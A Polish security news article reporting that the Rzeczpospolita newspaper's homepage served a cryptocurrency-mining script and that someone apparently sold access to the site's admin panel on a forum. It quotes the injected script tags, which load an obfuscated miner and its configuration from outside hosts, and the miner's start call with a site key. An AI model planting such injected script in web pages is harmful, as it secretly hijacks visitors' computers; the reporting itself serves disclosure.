Nawet główna strona Rzeczpospolitej kopie kryptowaluty na Waszych komputerach

Od kilku miesięcy wiele popularnych witryn internetowych jest przyłapywanych na kopaniu kryptowalut na komputerach gości. Niektóre skrypty instalują same, niektórym najwyraźniej pomagają przestępcy.

Dzisiaj do grona witryn nadużywających zasobów komputerów je odwiedzających dołącza strona główna Rzeczpospolitej. Choć sytuacja finansowa wydawnictw prasowych nie jest łatwa, to raczej podejrzewamy tutaj działanie przestępców.

Alert na Twitterze i ESET w akcji

Maja Niedźwiecka poinformowała na Twitterze, że jej ESET przyłapał witrynę Rzeczpospolitej na kopaniu kryptowaluty – prawdopodobnie Monero.

Sprawdziliśmy – faktycznie, każda przeglądarka odwiedzająca stronę Rzeczpospolitej otrzymuje nadal polecenie uruchomienia skryptu kopiącego kryptowaluty. Fragment strony wygląda tak:

<script src="https://www.webassembly.stream/0ppS.js"></script><script src="https://pastebin.com/raw/vf427gKs"></script>

i znajduje się w pobliżu stopki serwisu. Pierwsza część kodu pobiera zaciemnionego minera, druga to jego konfiguracja.

var miner = new Client.Anonymous('cabf0512bc5e1173a7a52df989519fbdbe9111562604d6ba56ac255cba853b4f', { throttle: 0.8 }); miner.start();

Przestępcy mieli tyle przyzwoitości, że przynajmniej ograniczyli moc kopania do 0,8 domyślnej, dzięki czemu proces nie zjada całej mocy procesora.

Dostęp przez panel administratora?

Co ciekawe, ponad tydzień temu otrzymaliśmy informację, że na forum Cebulka pojawiła się interesująca oferta sprzedaży dostępu.

Ktoś sprzedawał dostęp do panelu zarządzania serwisem dużej polskiej gazety. W późniejszych wpisach wspominał o ponad 7 milionach wizyt miesięcznie. Pasuje do do danych z serwisu SimilarWeb opisujących stronę rp.pl:

Oferta na początku opiewała na 1 BTC (ok. 50 tysięcy złotych), potem połowę tej kwoty, aż w końcu już tylko ok. 15 tysięcy złotych. Co ciekawe, nasz informator napisał nam tak:

jak nie sprzeda bedzie kopal krypto

To może oznaczać, że sprzedawca nie otrzymał satysfakcjonującej go oferty i sam postanowił inaczej spożytkować swój dostęp. Mamy nadzieję, że administratorzy Rzeczspopolitej skrypt szybko usuną i poprawią błędy, dzięki którym przestępcy dostali się do panelu administratora.